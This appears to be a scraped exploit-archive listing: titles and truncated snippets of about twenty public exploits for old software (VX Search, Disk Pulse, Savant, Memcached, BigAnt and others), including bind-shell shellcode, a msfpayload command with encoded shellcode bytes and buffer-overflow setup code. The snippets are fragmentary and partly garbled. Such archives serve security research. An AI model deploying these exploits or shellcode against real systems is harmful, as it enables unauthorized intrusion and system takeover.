Memcached 1.4.33 - 'Crash' (PoC)

Source: http://paper.seebug.org/95/ import struct import socket import sys MEMCACHEDREQUESTMAGIC = "\x80" OPCODEPREPENDQ = "\x1a" keylen = struct.pack"!H",0xfa extralen = "\x00" datatype = "\x00" vbucket = "\x00\x00" bodylen = struct.pack"!I",0 opaque = struct.pack"!I",0 CAS = struct.pack"!Q",0...

VX Search Enterprise 9.0.26 Buffer Overflow

!/usr/bin/python print "VX Search Enterprise 9.0.26 Buffer Overflow Exploit" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT AUTHORITY\SYSTEM You do not need to be authenticated, password below is...

Dup Scout Enterprise 9.0.28 Buffer Overflow

!/usr/bin/python print "Dup Scout Enterprise 9.0.28 Buffer Overflow Exploit" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT AUTHORITY\SYSTEM You do not need to be authenticated, password below is...

Disk Pulse Enterprise 9.0.34 - Buffer Overflow Exploit

Exploit for windows platform in category remote exploits !/usr/bin/python print "Disk Pulse Enterprise 9.0.34 Buffer Overflow Exploit" print "Author: Tulpa // tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpa-security.com Exploit will land you NT...

Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)

// Title: Linux X86 Bind TCP:4444 656 bytes // Author: Brandon Dennis // Contact: email protected // Date: 5/24/2016 // ASM Source: https://github.com/slyth11907/x86-ASM-Linux-Intel/blob/master/Code-Examples/ShellCode/execve-stack-bind.asm / ; Filename: execve-stack-bind.asm ; Author: Brandon...

Quick Tftp Server Pro 2.3 - Read Mode Denial of Service

Exploit for windows platform in category dos / poc Exploit Title: Quick Tftp Server Pro 2.3 TFTP mode Remote Overflow DoS Date: 21/01/2016 Exploit Author: Guillaume Kaddouch Twitter: @gkweb76 Blog: https://networkfilter.blogspot.com GitHub: https://github.com/gkweb76/exploits Vendor Homepage:...

Linux/x86-64 - Bindshell 4444/TCP with Password Prompt Shellcode (162 bytes)

/--------------------------------------------------------------------------------------------------------------------- / Title: tcp bindshell with password prompt in 162 bytes Author: Sathish kumar Contact: https://www.linkedin.com/in/sathish94 Description: x64 Linux bind TCP port shellcode on po...

SMF (Simple Machine Forum) 2.0.10 Remote Memory Exfiltration

!/usr/bin/python -- coding: iso-8859-15 -- Title: SMF Simple Machine Forum Filippo Roncari Truel Lab http://lab.truel.it Requirements: SMF = 2.0.10 PHP = 5.6.11 / 5.5.27 / 5.4.43 Advisories: TL-2015-PHP04 http://lab.truel.it/d/advisories/TL-2015-PHP04.txt TL-2015-PHP06...

Easy File Management Web Server 5.6 Buffer Overflow

!/usr/bin/python Exploit Title: Easy File Management Web Server v5.6 - USERID Remote Buffer Overflow Version: 5.6 Date: 2015-08-17 Author: Tracy Turben [email protected] Software Link: http://www.efssoft.com/ Tested on: Win7x32-EN Special Thanks To: Julien Ahrens for the crafted jmp esp Trick...

Savant-Web-Server-3.1

import socket targetaddress="10.10.10.129" targetport=80 buffer2 = "R0cX" + "R0cX" msfpayload windows/shellbindtcp LPORT=4444 R | msfencode -e x86/shikataganai -c 4 -t c buffer2 += "\xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"...

HP-Data-Protector-A.06.20

This script allows to execute a command with an arbitrary number of arguments. The trick calls 'perl.exe' interpreter installed with HP Data Protector inside the directory installpath/bin/. The main goal of the script is to bypass the limitation of executing only a single command without any...

MinaliC Webserver 2.0.0 - Buffer Overflow

No description provided by source. !/usr/bin/env python Exploit Title: MinaliC Webserver buffer overflow Date: 12 Apr 2013 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://minalic.sourceforge.net/ Version: MinaliC Webserver 2.0.0 Tested on: Windows XP Pro SP2,...

Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability

No description provided by source. Title : Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability Author : Prabhu S Angadi SecPod Technologies www.secpod.com Vendor : http://www.netmechanica.com Advisory : http://secpod.org/blog/?p=481...

BigAnt Server 2.52 - Remote Buffer Overflow Exploit (2)

No description provided by source. !/usr/bin/python BigAnt Server 2.52 remote buffer overflow exploit 2 Author: DouBleZer0 Vulnerability discovered by Lincoln a another version of the original exploit by Lincoln application is little hazy.. import sys,socket host = sys.argv1 buffer= \x90 20...

Crob FTP Server <= 3.6.1 - Remote Stack Overflow Exploit

No description provided by source. / CrobFTP remote stack overflow PoC --------------------------------- Tested on Crob FTP Server 3.6.1, Windows XP Coded by Leon Juranic [email protected] LSS Security / http://security.lss.hr / include stdio.h include windows.h include time.h pragma comment...

Prozilla 1.3.6 - Remote Stack Overflow Exploit

No description provided by source. / 20/10/2004 This is a private work of Serkan Akpolat [email protected] for the unpublished prozilla-1.3.6 format string/buffer overflow vulnerability , though this version only exploits the stack overflow. Tested against current gentoo/slack/debian/suse wi...

WFTPD 3.3 - Remote REST DoS

No description provided by source. WFTPD 3.3 unhandled exception xdmnt 2010 -- coding: windows-1252 -- import socket import sys, time def helpinfo: print Usage: wftpdkill host login password existingfle\n def dosithostname, username, passwd, exfile: sock = socket.socketsocket.AFINET,...

Personal File Share 1.0 DoS

No description provided by source. !/usr/bin/python Exploit Title: Personal File Share 1.0 DoS Date: 2nd April 2013 Exploit Author: npn Vendor Homepage: http://www.srplab.com/ Software Link: http://download.cnet.com/Personal-File-Share/3000-185064-75893424.html Version: 1.0 Tested on: Windows XP...

Wireshark 1.2.5 LWRES getaddrbyname BOF - calc.exe

No description provided by source. !/usr/bin/env python Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow Discovered by babi Reference: http://www.exploit-db.com/exploits/11288 Exploit Dev by Nullthreat & Pure|Hate import socket, sys try: host = sys.argv1 except: print usage: +...

SapporoWorks Black JumboDog 2.6.4/2.6.5 HTTP Proxy Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/3858/info Black JumboDog 2.6.4 and 2.6.5 HTTP proxy is vulnerable to an exploitable buffer overflow. The buffer overflow can be exploited by sending excessively long expires, if-modified-since, and LastModified strings...